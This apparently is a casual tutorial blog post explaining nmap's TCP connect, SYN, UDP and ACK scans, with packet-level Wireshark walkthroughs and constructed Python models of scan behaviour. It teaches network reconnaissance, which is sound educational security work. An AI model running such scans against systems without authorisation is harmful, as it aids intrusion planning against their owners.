Nmap Scans a Deep Dive


Part I



Hello everyone, long time no see, huh!!

As the heading suggests, we are going to learn about nmap scans. Aren't you excited!!

Well, the same goes for me!!

So let's dive in :)





Introduction to nmap :

Nmap (Network Mapper) is an open source tool. It is often used to determine which hosts in a network are alive, which ports are open on those hosts, which services are running on those open ports, and which version of each service is listening. It can also run vulnerability assessment scripts to determine whether a service is vulnerable. A penetration tester can use it to identify open ports and gather more information about a target, and a security administrator can use it to find ports on their own systems that are open but not in use. In this blog we will go through the popular scans that can be done with nmap; note that this doesn't cover every nmap scan type, just the popular ones. Without further ado, let's get into the scans and get our hands dirty. The real fun comes when we sniff the traffic generated by nmap and understand it, so we have Wireshark here as well!!

Full TCP scan or full open scan :

Command :

sudo nmap -sT TargetIpAddress

This scan attempts to make a full TCP connection to the destination port and then decides whether the port is open or closed from the response. TCP connect scan is the default TCP scan type when SYN scan is not an option.


Fig : 1.1




So it says port 80 is open, let's examine it.

Fig : 1.2



In Fig : 1.2 we can see the packet exchange between the attacker and target machines, which goes like this :

1) A SYN packet is sent from the attacker machine to the destination machine (with destination port set to 80).

2) A SYN/ACK packet is sent from the target machine to the attacker machine.

3) An ACK is sent from the attacker machine to the target machine (acknowledgement).

4) Right after it, an RST/ACK packet is sent from the attacker machine to the target machine (connection termination).

You can observe that it made a full connection and then terminated the connection after establishment.


Now let's examine a closed port on the target machine.

Fig : 1.3 



In Fig : 1.3 we can see that the target machine answers the SYN packet sent by the attacker machine with an RST/ACK packet. Also remember that, by default, nmap scans the 1000 most popular ports regardless of the scan type.

Note :

There is no need to be root or a sudo user to perform this full TCP scan, but the host discovery method changes. If you have no idea about host discovery methods, check out my blog that I wrote just for you :)


Did you know 💡:

Something most people don't know about this scan: instead of writing raw packets as most other scan types do (which we will learn about next), nmap asks the underlying operating system to establish a connection with the target machine and port using the connect system call. This is the same high-level system call that web browsers use to establish a connection, and nmap uses this API to obtain status information on each connection attempt rather than reading raw packet responses off the wire (which it does for the other scans).


TCP SYN or stealth scan :

Command :

sudo nmap -sS TargetIpAddress

Stealth scan is also known as half-open scan, and you will see why in a minute.

Fig : 1.4




In Fig : 1.4 the results of the scan are no different, so what's the point in using this scan?

Now if that's how you think, then I've got a meme explaining our situation.

Yep! You are right, they aren't the same. To see the difference, let's dig deeper with the help of Wireshark.

Wireshark capture if the port is open :

Fig : 1.5




As you can see in Fig : 1.5, here we did not complete the TCP handshake; we just sent an RST packet in return for the SYN/ACK packet, and this explains why this scan is called a half-open scan. You might wonder why we do this and what the difference is. This scan is meant to make the attacker stealthy by avoiding a log entry on the target that would then alert the network. That isn't really stealthy anymore, since firewalls are pretty advanced now, but it is faster than the full TCP scan because we cut the connection off in the middle.

If the port is closed :

Fig : 1.6

This is similar to the full TCP scan (-sT) because the same SYN flag is used to initiate the connection, so an RST/ACK packet is sent in return for the TCP SYN packet.


Did you know 💡:

In this scan nmap requires raw-packet privileges, which let it send crafted packets. Nmap sends the crafted packets to the target itself, unlike the full TCP connect scan, where it asks the underlying OS to initiate the connection using the connect system call. In simple words, nmap sends the packets to the target, not the OS. After receiving the SYN/ACK in response to the SYN, nmap could send the RST packet itself, but it doesn't need to: the OS also receives the SYN/ACK, which it doesn't expect because nmap crafted the SYN packet itself, so the OS responds to the unexpected SYN/ACK with an RST packet.

UDP scan :

Command :

sudo nmap -sU TargetIpAddress

Before performing a UDP scan, I would first like to make clear that you can have a total of 65,535 TCP ports and another 65,535 UDP ports, so in total there are 131070 ports if we combine both TCP and UDP ports. To be more precise, there is also a port 0 for TCP and a port 0 for UDP.
 
 
 
Yes, that's my legit reaction when I came to know this. You might already know it, but I had no clue!! It's like someone saying :

In case you don't know, DNS runs on TCP as well as UDP port 53. So if there is a DHCP service running on the remote host, we should use the UDP scan to get accurate results, because DHCP uses UDP ports, and if you do a TCP scan on ports 67/68 (the DHCP ports) it will not give you an accurate result. So it is very important to know which protocol a particular service uses and scan accordingly. Let me show an example as well, Fig : 1.7.

Fig : 1.7


You can see the difference between the UDP scan and the TCP scan on the same port 22 (ssh).

We know that UDP works without any response from the other party, and that is what makes the UDP scan a bit different and difficult to understand. But don't worry mate, I am here just for you :). Before we go through the scan behaviour, let me say that when nmap performs a UDP scan it actually sends an empty UDP packet to the destination port, and there will be no reply, which leaves us with two possibilities :

1) The target port received the packet and left us with no response.

Guess what possibility 2 might be? ........

2) There might be a firewall in between which is just blocking all the packets!

For some protocol-specific ports, instead of sending empty packets nmap adds a payload that might make the destination port respond. But as I said, payloads are only available for a few ports, which means you will often see the open|filtered status when you perform UDP scans on a target.

UDP scan behaviour :

Open :

Any UDP response from the target

Open|filtered :

No response received, even after retransmissions

Closed :

ICMP port unreachable error (type 3, code 3)

Filtered :

Other ICMP unreachable errors (type 3, code 1, 2, 9, 10, or 13)

Did you know 💡 :

I've got a story, and video proof of it, that I am about to share with you, straight from the dark web. So....

Story :

It's a rainy night and there are teenagers in a haunted house playing truth or dare, and a guy took dare. So taking that as an opportunity, an evil cybersecurity guy named nikhil told him to dance until the UDP scan completes, and let me share a recently leaked glimpse of him dancing.

You know that I am just kidding, right?! 😅

Well, what I am trying to say is that a UDP scan takes a very long time to complete.

I guess I didn't piss you off, right my friend? 😅
 
 
 
Some of the reasons the nmap UDP scan is slow :

  • Open and filtered ports rarely send any response, leaving Nmap to time out and then conduct retransmissions just in case the probe or response was lost.
  • It's a drag if the port is closed, because of rate limiting of ICMP port unreachable messages. Linux and Solaris are particularly strict about this. For example, the Linux 2.4.20 kernel limits destination unreachable messages to one per second, so Nmap detects rate limiting and slows down accordingly to avoid flooding the network.


To improve UDP scan results :

Ideas for speeding your UDP scans up include scanning more hosts in parallel, doing a quick scan of just the popular ports first, scanning from behind the firewall, and using --host-timeout to skip slow hosts.
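To make the two slow-downs above concrete, here is an added Python model (mine, not nmap's code) of a -sU run against a constructed host: open ports answer, closed ports send ICMP type 3 / code 3 but only once per second, like the Linux rate limit described above, and silent ports force the scanner's timeout and retransmissions. It reports the states from the behaviour table above and the virtual seconds the scan took; the host, port sets, timeout and retry count are assumptions, and the scanner just waits out the rate limit rather than reproducing nmap's own adaptive slow-down.

```python
from dataclasses import dataclass

ICMP_UNREACHABLE = 3

@dataclass
class Host:
    """Constructed target: UDP ports that answer, closed ports that send ICMP
    port unreachable, and a Linux-style limit of one unreachable per second."""
    answering: set
    closed: set
    icmp_interval: float = 1.0      # seconds between unreachable messages
    last_icmp: float = float("-inf")

    def probe(self, port, now):
        """Reply to an empty UDP probe sent at virtual time `now`, or None."""
        if port in self.answering:
            return ("udp",)                           # any UDP data -> open
        if port in self.closed:
            if now - self.last_icmp >= self.icmp_interval:
                self.last_icmp = now
                return ("icmp", ICMP_UNREACHABLE, 3)  # type 3, code 3
            return None                               # rate limited: silence
        return None                                   # dropped, or open but silent

def state_of(reply):
    """Apply the UDP scan rules; None means 'no verdict yet, retransmit'."""
    if reply is None:
        return None
    if reply[0] == "udp":
        return "open"                       # any UDP response
    _, icmp_type, code = reply
    if icmp_type == ICMP_UNREACHABLE:
        if code == 3:
            return "closed"                 # port unreachable
        if code in (1, 2, 9, 10, 13):
            return "filtered"               # other unreachable codes
    return None

def udp_scan(host, ports, timeout=1.0, retries=2):
    """Scan ports one at a time; returns (states, virtual seconds elapsed)."""
    now, states = 0.0, {}
    for port in ports:
        state = None
        for _ in range(retries + 1):
            state = state_of(host.probe(port, now))
            if state:
                break
            now += timeout            # wait out the silence, then retransmit
        states[port] = state or "open|filtered"
    return states, now
```

Running `udp_scan(Host(answering={53}, closed={67, 68, 69, 123}), [53, 67, 68, 69, 123, 161])` takes 6 virtual seconds, and the same host with `icmp_interval=0.0` takes 3: every closed port after the first costs a full timeout, which is exactly the rate-limit drag the second bullet describes.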
 
 

ACK scan or firewall detection scan :

As we are talking about firewalls, many people think that Windows Firewall is an actual firewall. For those who think that Windows has a good defensive system :

Le Windows Firewall :

Sorry Bill Gates macha 😅

But anyway, moving on with the scan :

Have you ever been in a dilemma that there might be a firewall blocking the packets from reaching the target ports? Well, this is going to help you find out if there is a firewall in between. We can also determine whether the firewall is stateful or not.
 
Command :

sudo nmap -sA TargetIpAddress

Fig : 1.8

In Fig : 1.8 we can see that ports 21, 22, 80 and 8080 are filtered and all remaining ports are unfiltered.

Wireshark analysis on port 80 on the basis of the previous output :

You see, you see my friend!! There is no reply from the destination port for the ACK packet we sent, because I have set a firewall to drop all the TCP packets :) (don't know why I am using this thing a lot :) ).

Wireshark analysis on an unfiltered port on the basis of the previous output :


Note :
  • Remember that the ACK scan does not look for open or closed ports; all it does is check whether the port is filtered or not.
  • If the ACK sent by the attacker reaches the target port, irrespective of the port's state (open or closed), we get an RST packet in return, and thus we can confirm that the port is unfiltered.
  • In more detail: while scanning systems with ACK packets, open and closed ports both return an RST packet. Nmap then labels them as unfiltered, meaning that they are reachable by the ACK packet, but whether they are open or closed is undetermined.

Nmap depicts the states of the ports as follows :

Unfiltered :

A TCP RST packet is received in return from the target port

Filtered :

No response received even after several retransmissions
Packets with ICMP unreachable error (type 3, code 1, 2, 3, 9, 10, or 13)
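As an added example (mine, not from the original post), here is a small Python classifier that replays the packet exchanges shown in the Wireshark figures above for -sT (Fig : 1.2 and 1.3), -sS (Fig : 1.5 and 1.6) and -sA, and labels each target port the way nmap reports it. The addresses and packets are constructed, not a real capture, and the patterns also include the no-reply case, which nmap reports as filtered.

```python
from collections import defaultdict

SCANNER = "10.0.0.5"   # constructed: the machine running nmap
TARGET = "10.0.0.9"    # constructed: the scanned host

# Constructed packets in the spirit of Wireshark's Info column:
# (source ip, destination ip, target port, TCP flags). Not a real capture.
PACKETS = [
    (SCANNER, TARGET, 80, "SYN"),       # -sT on an open port: full handshake,
    (TARGET, SCANNER, 80, "SYN,ACK"),   # then nmap tears the connection down
    (SCANNER, TARGET, 80, "ACK"),
    (SCANNER, TARGET, 80, "RST,ACK"),
    (SCANNER, TARGET, 22, "SYN"),       # -sS on an open port: half open,
    (TARGET, SCANNER, 22, "SYN,ACK"),   # the SYN/ACK is answered with a bare RST
    (SCANNER, TARGET, 22, "RST"),
    (SCANNER, TARGET, 8080, "SYN"),     # -sT or -sS on a closed port
    (TARGET, SCANNER, 8080, "RST,ACK"),
    (SCANNER, TARGET, 443, "ACK"),      # -sA on a reachable port: RST back
    (TARGET, SCANNER, 443, "RST"),
    (SCANNER, TARGET, 21, "ACK"),       # -sA on a port a firewall drops: silence
]

# Flag sequences from the figures, keyed by direction
# ('>' scanner to target, '<' target to scanner).
PATTERNS = {
    (">SYN", "<SYN,ACK", ">ACK", ">RST,ACK"): ("open", "connect scan (-sT)"),
    (">SYN", "<SYN,ACK", ">RST"): ("open", "SYN scan (-sS), half open"),
    (">SYN", "<RST,ACK"): ("closed", "SYN answered with RST/ACK"),
    (">SYN",): ("filtered", "no reply to the SYN"),
    (">ACK", "<RST"): ("unfiltered", "ACK scan (-sA), RST means reachable"),
    (">ACK",): ("filtered", "ACK scan (-sA), no reply"),
}

def flows_by_port(packets):
    """Group packets into one ordered flag sequence per target port."""
    flows = defaultdict(list)
    for src, _dst, port, flags in packets:
        flows[port].append((">" if src == SCANNER else "<") + flags)
    return flows

def classify(packets):
    """Map each target port to (nmap port state, the exchange that produced it)."""
    return {port: PATTERNS.get(tuple(seq), ("unknown", "unrecognised exchange"))
            for port, seq in flows_by_port(packets).items()}

if __name__ == "__main__":
    for port, (state, why) in sorted(classify(PACKETS).items()):
        print(f"port {port}: {state} ({why})")
```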


So....................... Shall we stop here?

Ok then, byeeeeeeeeeeeeeeee................................ See ya in Part 2 :)

 


